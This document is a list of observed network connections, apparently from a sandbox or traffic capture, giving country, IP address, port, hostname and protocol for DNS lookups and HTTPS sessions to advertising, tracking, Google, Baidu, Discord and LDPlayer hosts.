DE 162.19.138.116:443 lb.eu-1-id5-sync.com tcp
US 104.26.8.178:443 prebid-stag.setupad.net tcp
US 104.26.8.178:443 prebid-stag.setupad.net tcp
US 104.26.8.178:443 prebid-stag.setupad.net tcp
US 104.26.8.178:443 prebid-stag.setupad.net tcp
US 8.8.8.8:53 cadmus.script.ac udp
US 104.26.8.169:443 script.4dex.io tcp
NL 178.250.1.11:443 gum.criteo.com tcp
DE 162.19.138.119:443 lb.eu-1-id5-sync.com tcp
US 104.18.23.145:443 cadmus.script.ac tcp
US 104.26.8.169:443 script.4dex.io tcp
US 8.8.8.8:53 u.openx.net udp
US 8.8.8.8:53 cm.adform.net udp
US 35.244.159.8:443 u.openx.net tcp
US 35.244.159.8:443 u.openx.net tcp
DK 37.157.6.232:443 cm.adform.net tcp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 888a027caaa9f7c96f3f23f688c8247e.safeframe.googlesyndication.com udp
NL 185.89.210.180:443 ib.adnxs.com tcp
GB 172.217.169.65:443 888a027caaa9f7c96f3f23f688c8247e.safeframe.googlesyndication.com tcp
US 35.244.159.8:443 u.openx.net udp
US 8.8.8.8:53 26e432fb424cc230e40c74bea40b3501.safeframe.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 u.4dex.io udp
US 8.8.8.8:53 cms.quantserve.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 c1.adform.net udp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 34.149.40.38:443 u.4dex.io tcp
DK 37.157.2.230:443 c1.adform.net tcp
DE 91.228.74.200:443 cms.quantserve.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 15.197.193.217:443 match.adsrvr.org tcp
GB 216.58.201.98:443 cm.g.doubleclick.net tcp
GB 216.58.201.98:443 cm.g.doubleclick.net tcp
US 8.8.8.8:53 openx2-match.dotomi.com udp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
US 35.227.252.103:443 rtb.openx.net udp
US 8.8.8.8:53 pr-bh.ybp.yahoo.com udp
US 8.8.8.8:53 x.bidswitch.net udp
US 8.8.8.8:53 creativecdn.com udp
US 8.8.8.8:53 dis.eu.criteo.com udp
NL 89.207.16.140:443 openx2-match.dotomi.com tcp
US 54.147.95.198:443 sync.srv.stackadapt.com tcp
IE 108.129.22.139:443 pr-bh.ybp.yahoo.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
NL 35.214.149.91:443 x.bidswitch.net tcp
NL 178.250.1.9:443 dis.eu.criteo.com tcp
US 8.8.8.8:53 eu-u.openx.net udp
US 8.8.8.8:53 us-u.openx.net udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 ldcdn.ldmnq.com udp
GB 142.250.200.3:443 www.google.co.uk udp
GB 79.133.176.219:443 ldcdn.ldmnq.com tcp
GB 79.133.176.219:443 ldcdn.ldmnq.com tcp
US 8.8.8.8:53 169.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 11.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 119.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 103.252.227.35.in-addr.arpa udp
US 8.8.8.8:53 78.153.64.172.in-addr.arpa udp
US 8.8.8.8:53 90.8.184.185.in-addr.arpa udp
US 8.8.8.8:53 96.238.202.149.in-addr.arpa udp
US 8.8.8.8:53 8.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 18.140.106.185.in-addr.arpa udp
US 8.8.8.8:53 66.97.40.145.in-addr.arpa udp
US 8.8.8.8:53 233.6.157.37.in-addr.arpa udp
US 8.8.8.8:53 116.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 178.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 145.23.18.104.in-addr.arpa udp
US 8.8.8.8:53 8.159.244.35.in-addr.arpa udp
US 8.8.8.8:53 232.6.157.37.in-addr.arpa udp
US 8.8.8.8:53 180.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 65.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 38.40.149.34.in-addr.arpa udp
US 8.8.8.8:53 217.193.197.15.in-addr.arpa udp
US 8.8.8.8:53 200.74.228.91.in-addr.arpa udp
US 8.8.8.8:53 230.2.157.37.in-addr.arpa udp
US 8.8.8.8:53 98.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 140.16.207.89.in-addr.arpa udp
US 8.8.8.8:53 139.22.129.108.in-addr.arpa udp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 91.149.214.35.in-addr.arpa udp
US 8.8.8.8:53 198.95.147.54.in-addr.arpa udp
US 8.8.8.8:53 ads.avct.cloud udp
US 8.8.8.8:53 cdn.ampproject.org udp
US 8.8.8.8:53 node.setupad.com udp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
DE 159.89.25.223:443 node.setupad.com tcp
US 8.8.8.8:53 ssbsync-global.smartadserver.com udp
US 8.8.8.8:53 ads.pubmatic.com udp
GB 2.21.188.239:443 ads.pubmatic.com tcp
FR 5.135.209.100:443 ssbsync-global.smartadserver.com tcp
US 8.8.8.8:53 219.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 223.25.89.159.in-addr.arpa udp
US 8.8.8.8:53 239.188.21.2.in-addr.arpa udp
US 8.8.8.8:53 100.209.135.5.in-addr.arpa udp
US 8.8.8.8:53 rtb.gumgum.com udp
IE 52.208.44.24:443 rtb.gumgum.com tcp
US 8.8.8.8:53 ice.360yield.com udp
US 8.8.8.8:53 ads.us.e-planning.net udp
IE 54.220.54.255:443 ice.360yield.com tcp
NL 193.3.178.4:443 ads.us.e-planning.net tcp
US 8.8.8.8:53 static.criteo.net udp
NL 178.250.1.3:443 static.criteo.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
US 8.8.8.8:53 s.e-planning.net udp
US 8.8.8.8:53 cookies.nextmillmedia.com udp
US 8.8.8.8:53 sync.1rx.io udp
US 8.8.8.8:53 ssum.casalemedia.com udp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 spl.zeotap.com udp
US 34.193.221.2:443 cookies.nextmillmedia.com tcp
NL 193.3.178.1:443 s.e-planning.net tcp
US 8.8.8.8:53 u-ams03.e-planning.net udp
DE 51.89.9.252:443 onetag-sys.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 104.18.36.155:443 ssum.casalemedia.com tcp
US 34.149.40.38:443 u.4dex.io udp
US 172.67.40.173:443 spl.zeotap.com tcp
NL 193.3.178.4:443 u-ams03.e-planning.net tcp
NL 193.3.178.4:443 u-ams03.e-planning.net tcp
US 8.8.8.8:53 24.44.208.52.in-addr.arpa udp
US 8.8.8.8:53 255.54.220.54.in-addr.arpa udp
US 8.8.8.8:53 4.178.3.193.in-addr.arpa udp
US 8.8.8.8:53 3.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 1.178.3.193.in-addr.arpa udp
US 8.8.8.8:53 117.174.228.46.in-addr.arpa udp
US 8.8.8.8:53 252.9.89.51.in-addr.arpa udp
US 8.8.8.8:53 155.36.18.104.in-addr.arpa udp
US 8.8.8.8:53 173.40.67.172.in-addr.arpa udp
US 8.8.8.8:53 2.221.193.34.in-addr.arpa udp
US 104.18.36.155:443 ssum.casalemedia.com udp
US 8.8.8.8:53 sync.a-mo.net udp
US 8.8.8.8:53 adxbid.info udp
US 8.8.8.8:53 setupad-d.openx.net udp
US 104.21.48.215:443 adxbid.info tcp
NL 145.40.97.67:443 sync.a-mo.net tcp
US 8.8.8.8:53 um.simpli.fi udp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
US 8.8.8.8:53 image6.pubmatic.com udp
US 34.36.216.150:443 pixel-sync.sitescout.com tcp
NL 35.204.74.118:443 um.simpli.fi tcp
US 8.8.8.8:53 assets.a-mo.net udp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 8.8.8.8:53 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-if-v6exp3-v4.metric.gstatic.com udp
US 104.19.158.19:443 assets.a-mo.net tcp
US 8.8.8.8:53 215.48.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.97.40.145.in-addr.arpa udp
US 8.8.8.8:53 150.216.36.34.in-addr.arpa udp
US 8.8.8.8:53 118.74.204.35.in-addr.arpa udp
GB 216.58.204.67:443 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-if-v6exp3-v4.metric.gstatic.com tcp
NL 46.228.164.11:443 ad.turn.com tcp
GB 216.58.204.67:443 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-if-v6exp3-v4.metric.gstatic.com udp
US 8.8.8.8:53 dis.criteo.com udp
US 8.8.8.8:53 storage.googleapis.com udp
NL 178.250.1.9:443 dis.criteo.com tcp
GB 142.250.180.27:443 storage.googleapis.com tcp
GB 142.250.180.27:443 storage.googleapis.com tcp
US 8.8.8.8:53 simage2.pubmatic.com udp
NL 198.47.127.205:443 simage2.pubmatic.com tcp
NL 198.47.127.205:443 simage2.pubmatic.com tcp
US 8.8.8.8:53 78.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 19.158.19.104.in-addr.arpa udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 11.164.228.46.in-addr.arpa udp
US 8.8.8.8:53 27.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 image2.pubmatic.com udp
US 8.8.8.8:53 sonata-notifications.taptapnetworks.com udp
DE 3.122.33.86:443 sonata-notifications.taptapnetworks.com tcp
US 8.8.8.8:53 sync.targeting.unrulymedia.com udp
NL 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
US 8.8.8.8:53 dsp.adfarm1.adition.com udp
US 8.8.8.8:53 t.adx.opera.com udp
DE 85.114.159.118:443 dsp.adfarm1.adition.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
US 8.8.8.8:53 sync-tm.everesttech.net udp
US 8.8.8.8:53 ad.mrtnsvr.com udp
US 151.101.130.49:443 sync-tm.everesttech.net tcp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
US 8.8.8.8:53 match.prod.bidr.io udp
IE 52.213.253.239:443 match.prod.bidr.io tcp
US 8.8.8.8:53 86.33.122.3.in-addr.arpa udp
US 8.8.8.8:53 8.213.145.82.in-addr.arpa udp
US 8.8.8.8:53 118.159.114.85.in-addr.arpa udp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 6.163.102.34.in-addr.arpa udp
US 8.8.8.8:53 cdn.ldplayer.net udp
US 8.8.8.8:53 sync.e-planning.net udp
NL 193.3.178.3:443 sync.e-planning.net tcp
GB 18.172.153.76:443 cdn.ldplayer.net tcp
US 8.8.8.8:53 csync.loopme.me udp
NL 35.214.130.85:443 csync.loopme.me tcp
GB 216.58.201.98:443 cm.g.doubleclick.net udp
US 8.8.8.8:53 d5p.de17a.com udp
SE 213.155.156.169:443 d5p.de17a.com tcp
US 8.8.8.8:53 bh.contextweb.com udp
NL 208.93.169.131:443 bh.contextweb.com tcp
US 8.8.8.8:53 ipac.ctnsnet.com udp
US 35.186.193.173:443 ipac.ctnsnet.com tcp
US 8.8.8.8:53 rtb-csync.smartadserver.com udp
NL 89.149.193.104:443 rtb-csync.smartadserver.com tcp
US 8.8.8.8:53 p.rfihub.com udp
NL 193.0.160.131:443 p.rfihub.com tcp
US 8.8.8.8:53 core.iprom.net udp
SI 195.5.165.20:443 core.iprom.net tcp
US 8.8.8.8:53 239.253.213.52.in-addr.arpa udp
US 8.8.8.8:53 76.153.172.18.in-addr.arpa udp
US 8.8.8.8:53 3.178.3.193.in-addr.arpa udp
US 8.8.8.8:53 85.130.214.35.in-addr.arpa udp
US 8.8.8.8:53 169.156.155.213.in-addr.arpa udp
US 8.8.8.8:53 131.169.93.208.in-addr.arpa udp
US 8.8.8.8:53 113.216.138.108.in-addr.arpa udp
US 8.8.8.8:53 145.178.204.143.in-addr.arpa udp
US 8.8.8.8:53 173.193.186.35.in-addr.arpa udp
US 8.8.8.8:53 104.193.149.89.in-addr.arpa udp
US 8.8.8.8:53 131.160.0.193.in-addr.arpa udp
US 8.8.8.8:53 green.erne.co udp
FR 141.94.242.226:443 green.erne.co tcp
US 8.8.8.8:53 cm-supply-web.gammaplatform.com udp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 pixel-eu.onaudience.com udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 cr.frontend.weborama.fr udp
US 8.8.8.8:53 mwzeom.zeotap.com udp
FR 54.38.113.7:443 pixel-eu.onaudience.com tcp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
US 8.8.8.8:53 ups.analytics.yahoo.com udp
US 34.36.216.150:443 pixel-sync.sitescout.com udp
US 8.8.8.8:53 pubmatic-match.dotomi.com udp
US 8.8.8.8:53 match.adsby.bidtheatre.com udp
DE 3.71.149.231:443 ups.analytics.yahoo.com tcp
NL 134.122.57.34:443 match.adsby.bidtheatre.com tcp
NL 63.215.202.137:443 pubmatic-match.dotomi.com tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 s.amazon-adsystem.com udp
US 8.8.8.8:53 tr.blismedia.com udp
US 52.46.143.56:443 s.amazon-adsystem.com tcp
US 34.96.105.8:443 tr.blismedia.com tcp
US 8.8.8.8:53 image8.pubmatic.com udp
US 8.8.8.8:53 pixel.rubiconproject.com udp
US 8.8.8.8:53 id.a-mx.com udp
US 8.8.8.8:53 ap.lijit.com udp
NL 198.47.127.18:443 image8.pubmatic.com tcp
NL 69.173.156.148:443 pixel.rubiconproject.com tcp
NL 79.127.227.46:443 id.a-mx.com tcp
IE 54.171.112.191:443 ap.lijit.com tcp
US 8.8.8.8:53 ads.betweendigital.com udp
NL 188.42.189.197:443 ads.betweendigital.com tcp
US 34.111.129.221:443 cr.frontend.weborama.fr udp
US 8.8.8.8:53 apien.ldmnq.com udp
US 8.8.8.8:53 image4.pubmatic.com udp
GB 185.64.190.81:443 image4.pubmatic.com tcp
GB 13.224.132.126:443 apien.ldmnq.com tcp
US 8.8.8.8:53 20.165.5.195.in-addr.arpa udp
US 8.8.8.8:53 226.242.94.141.in-addr.arpa udp
US 8.8.8.8:53 7.113.38.54.in-addr.arpa udp
US 8.8.8.8:53 221.129.111.34.in-addr.arpa udp
US 8.8.8.8:53 231.149.71.3.in-addr.arpa udp
US 8.8.8.8:53 137.202.215.63.in-addr.arpa udp
US 8.8.8.8:53 34.57.122.134.in-addr.arpa udp
US 8.8.8.8:53 8.105.96.34.in-addr.arpa udp
US 8.8.8.8:53 56.143.46.52.in-addr.arpa udp
US 8.8.8.8:53 18.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 148.156.173.69.in-addr.arpa udp
US 8.8.8.8:53 46.227.127.79.in-addr.arpa udp
US 8.8.8.8:53 191.112.171.54.in-addr.arpa udp
US 8.8.8.8:53 81.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 pb-am.a-mo.net udp
US 8.8.8.8:53 dmp.adform.net udp
US 8.8.8.8:53 trc.taboola.com udp
US 8.8.8.8:53 dmp.v.fwmrm.net udp
US 8.8.8.8:53 sync.smartadserver.com udp
US 8.8.8.8:53 aa.agkn.com udp
US 8.8.8.8:53 beacon.krxd.net udp
US 8.8.8.8:53 usermatch.krxd.net udp
US 8.8.8.8:53 i.liadm.com udp
US 8.8.8.8:53 dsum-sec.casalemedia.com udp
US 8.8.8.8:53 ad4m.at udp
US 8.8.8.8:53 casale-match.dotomi.com udp
US 8.8.8.8:53 dmp.brand-display.com udp
NL 147.75.84.158:443 pb-am.a-mo.net tcp
US 151.101.129.44:443 trc.taboola.com tcp
DK 37.157.5.84:443 dmp.adform.net tcp
IE 54.171.118.212:443 dpm.demdex.net tcp
US 8.8.8.8:53 obgpm76tt0a0sgozk8l.redinuid.imrworldwide.com udp
DE 3.73.136.118:443 aa.agkn.com tcp
GB 18.172.153.76:443 cdn.ldplayer.net tcp
NL 81.17.55.106:443 sync.smartadserver.com tcp
US 34.234.127.232:443 i.liadm.com tcp
US 34.160.19.107:443 dmp.brand-display.com tcp
NL 89.207.16.137:443 casale-match.dotomi.com tcp
US 104.26.11.209:443 ad4m.at tcp
US 3.231.143.34:443 dmp.v.fwmrm.net tcp
IE 54.195.139.232:443 obgpm76tt0a0sgozk8l.redinuid.imrworldwide.com tcp
GB 18.172.153.76:443 cdn.ldplayer.net tcp
US 8.8.8.8:53 eb2.3lift.com udp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
US 76.223.111.18:443 eb2.3lift.com tcp
GB 143.204.67.183:80 ocsp.r2m01.amazontrust.com tcp
US 8.8.8.8:53 cm.adgrx.com udp
IE 52.215.155.11:443 cm.adgrx.com tcp
US 8.8.8.8:53 dsum.casalemedia.com udp
NL 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
US 8.8.8.8:53 126.132.224.13.in-addr.arpa udp
US 8.8.8.8:53 a.tribalfusion.com udp
US 8.8.8.8:53 44.129.101.151.in-addr.arpa udp
US 8.8.8.8:53 158.84.75.147.in-addr.arpa udp
US 8.8.8.8:53 84.5.157.37.in-addr.arpa udp
US 8.8.8.8:53 212.118.171.54.in-addr.arpa udp
US 8.8.8.8:53 118.136.73.3.in-addr.arpa udp
US 8.8.8.8:53 209.11.26.104.in-addr.arpa udp
US 8.8.8.8:53 106.55.17.81.in-addr.arpa udp
US 8.8.8.8:53 137.16.207.89.in-addr.arpa udp
US 8.8.8.8:53 232.139.195.54.in-addr.arpa udp
US 8.8.8.8:53 232.127.234.34.in-addr.arpa udp
US 8.8.8.8:53 34.143.231.3.in-addr.arpa udp
US 8.8.8.8:53 18.111.223.76.in-addr.arpa udp
US 8.8.8.8:53 183.67.204.143.in-addr.arpa udp
US 8.8.8.8:53 11.155.215.52.in-addr.arpa udp
US 8.8.8.8:53 matching.truffle.bid udp
US 104.18.25.173:443 a.tribalfusion.com tcp
US 104.18.25.173:443 a.tribalfusion.com tcp
DE 23.88.86.2:443 matching.truffle.bid tcp
US 8.8.8.8:53 as.ck-ie.com udp
US 8.8.8.8:53 uipglob.semasio.net udp
DE 23.88.86.2:443 matching.truffle.bid tcp
US 8.8.8.8:53 pixel.onaudience.com udp
US 8.2.110.113:443 as.ck-ie.com tcp
US 8.2.110.113:443 as.ck-ie.com tcp
FR 54.38.113.7:443 pixel.onaudience.com tcp
DK 77.243.51.122:443 uipglob.semasio.net tcp
DK 77.243.51.122:443 uipglob.semasio.net tcp
US 8.8.8.8:53 s.tribalfusion.com udp
US 104.18.25.173:443 s.tribalfusion.com udp
GB 18.245.143.118:443 tags.crwdcntrl.net tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.25.18.104.in-addr.arpa udp
US 8.8.8.8:53 122.51.243.77.in-addr.arpa udp
US 8.8.8.8:53 idsync.frontend.weborama.fr udp
US 8.8.8.8:53 8proof.com udp
US 34.111.131.239:443 idsync.frontend.weborama.fr tcp
US 34.111.131.239:443 idsync.frontend.weborama.fr tcp
US 52.116.53.150:443 8proof.com tcp
US 8.8.8.8:53 simage4.pubmatic.com udp
US 52.116.53.150:443 8proof.com tcp
US 8.8.8.8:53 ps.eyeota.net udp
DE 52.57.150.20:443 ps.eyeota.net tcp
US 8.8.8.8:53 id.rtb.mx udp
DE 52.57.150.20:443 ps.eyeota.net tcp
DE 79.127.216.47:443 id.rtb.mx tcp
US 8.8.8.8:53 239.131.111.34.in-addr.arpa udp
US 8.8.8.8:53 150.53.116.52.in-addr.arpa udp
US 8.8.8.8:53 ow.pubmatic.com udp
NL 185.64.189.116:443 ow.pubmatic.com tcp
US 8.8.8.8:53 d.turn.com udp
NL 46.228.164.13:443 d.turn.com tcp
US 8.8.8.8:53 20.150.57.52.in-addr.arpa udp
US 8.8.8.8:53 47.216.127.79.in-addr.arpa udp
US 8.8.8.8:53 116.189.64.185.in-addr.arpa udp
US 8.8.8.8:53 13.164.228.46.in-addr.arpa udp
US 8.8.8.8:53 113.110.2.8.in-addr.arpa udp
US 8.8.8.8:53 vid.vidoomy.com udp
GB 195.181.164.15:443 vid.vidoomy.com tcp
GB 195.181.164.15:443 vid.vidoomy.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 104.18.38.233:80 crt.sectigo.com tcp
US 8.8.8.8:53 15.164.181.195.in-addr.arpa udp
US 8.8.8.8:53 user-sync.adxpremium.services udp
US 209.192.201.180:443 user-sync.adxpremium.services tcp
US 8.8.8.8:53 vpaid.vidoomy.com udp
GB 89.187.167.4:443 vpaid.vidoomy.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 180.201.192.209.in-addr.arpa udp
US 8.8.8.8:53 4.167.187.89.in-addr.arpa udp
US 8.8.8.8:53 a.vidoomy.com udp
ES 212.36.83.246:443 a.vidoomy.com tcp
US 8.8.8.8:53 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i1-v6exp3.v4.metric.gstatic.com udp
US 8.8.8.8:53 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i2-v6exp3.ds.metric.gstatic.com udp
ES 212.36.83.246:443 a.vidoomy.com tcp
GB 216.58.212.242:443 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i1-v6exp3.v4.metric.gstatic.com tcp
GB 216.58.201.114:443 p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i2-v6exp3.ds.metric.gstatic.com tcp
ES 212.36.83.246:443 a.vidoomy.com tcp
US 8.8.8.8:53 246.83.36.212.in-addr.arpa udp
US 8.8.8.8:53 242.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 114.201.58.216.in-addr.arpa udp
CN 14.215.183.79:443 hm.baidu.com tcp
CN 14.215.183.79:443 hm.baidu.com tcp
CN 14.215.183.79:443 hm.baidu.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 middledata.ldplayer.net udp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
US 8.8.8.8:53 97.136.219.8.in-addr.arpa udp
GB 142.250.200.14:443 apis.google.com udp
GB 142.250.179.238:443 play.google.com udp
DE 23.88.86.2:443 matching.truffle.bid tcp
DE 162.55.120.196:443 matching.truffle.bid tcp
DE 162.55.120.196:443 matching.truffle.bid tcp
US 8.8.8.8:53 196.120.55.162.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
US 8.8.8.8:53 csm.nl3.eu.criteo.net udp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 8.8.8.8:53 246.187.250.142.in-addr.arpa udp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.246:443 i.ytimg.com udp
US 8.8.8.8:53 25.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 142.250.178.10:443 jnn-pa.googleapis.com udp
GB 142.250.200.14:443 www.youtube.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 6.213.58.216.in-addr.arpa udp
CN 183.240.98.228:443 hm.baidu.com tcp
CN 183.240.98.228:443 hm.baidu.com tcp
CN 183.240.98.228:443 hm.baidu.com tcp
GB 142.250.179.238:443 www.youtube.com udp
GB 142.250.179.238:443 www.youtube.com tcp
US 8.8.8.8:53 www.wireshark.org udp
US 104.26.11.240:443 www.wireshark.org tcp
US 104.26.11.240:443 www.wireshark.org tcp
US 104.26.11.240:443 www.wireshark.org udp
US 8.8.8.8:53 ticketing.wireshark.org udp
US 8.8.8.8:53 240.11.26.104.in-addr.arpa udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 73.80.16.104.in-addr.arpa udp
US 8.8.8.8:53 2.na.dl.wireshark.org udp
US 5.78.100.21:443 2.na.dl.wireshark.org tcp
US 5.78.100.21:443 2.na.dl.wireshark.org tcp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 21.100.78.5.in-addr.arpa udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
DE 162.55.120.196:443 matching.truffle.bid tcp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.26.11.240:443 ticketing.wireshark.org tcp
CN 111.45.3.198:443 hm.baidu.com tcp
CN 111.45.3.198:443 hm.baidu.com tcp
CN 111.45.3.198:443 hm.baidu.com tcp
GB 216.58.213.14:80 www.google-analytics.com tcp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
CN 14.215.182.140:443 hm.baidu.com tcp
CN 14.215.182.140:443 hm.baidu.com tcp
CN 14.215.182.140:443 hm.baidu.com tcp
US 8.8.8.8:53 middledata.ldplayer.net udp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
US 8.8.8.8:53 ad.ldplayer.net udp
US 8.8.8.8:53 cdn.ldplayer.net udp
US 8.8.8.8:53 en.ldplayer.net udp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
GB 79.133.176.225:443 en.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
US 8.8.8.8:53 advertise.ldplayer.net udp
GB 79.133.176.235:443 advertise.ldplayer.net tcp
US 8.8.8.8:53 30.153.172.18.in-addr.arpa udp
US 8.8.8.8:53 225.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 discord.gg udp
US 162.159.130.234:443 discord.gg tcp
US 162.159.130.234:443 discord.gg tcp
US 8.8.8.8:53 res.ldplayer.net udp
US 163.181.154.180:443 res.ldplayer.net tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 cloudflareinsights.com udp
US 104.16.79.73:443 cloudflareinsights.com tcp
US 163.181.154.180:443 res.ldplayer.net tcp
US 8.8.8.8:53 235.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 180.154.181.163.in-addr.arpa udp
US 8.8.8.8:53 73.79.16.104.in-addr.arpa udp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 142.250.178.14:443 google.com tcp
US 8.8.8.8:53 beacons5.gvt3.com udp
GB 216.58.213.3:443 beacons5.gvt3.com tcp
US 163.181.154.180:443 res.ldplayer.net tcp
US 163.181.154.180:443 res.ldplayer.net tcp
US 163.181.154.180:443 res.ldplayer.net tcp
SG 8.219.136.97:443 middledata.ldplayer.net tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 encdn.ldmnq.com udp
GB 18.172.153.10:443 encdn.ldmnq.com tcp
GB 79.133.176.235:443 advertise.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
US 8.8.8.8:53 10.153.172.18.in-addr.arpa udp
US 163.181.154.180:443 res.ldplayer.net tcp
US 163.181.154.180:443 res.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
GB 18.172.153.10:443 encdn.ldmnq.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 163.181.154.180:443 res.ldplayer.net tcp
US 163.181.154.180:443 res.ldplayer.net tcp
US 163.181.154.180:443 res.ldplayer.net tcp
GB 18.172.153.30:443 cdn.ldplayer.net tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 apien.ldmnq.com udp
GB 13.224.132.126:80 apien.ldmnq.com tcp
GB 13.224.132.126:443 apien.ldmnq.com tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 13.224.132.126:443 apien.ldmnq.com tcp
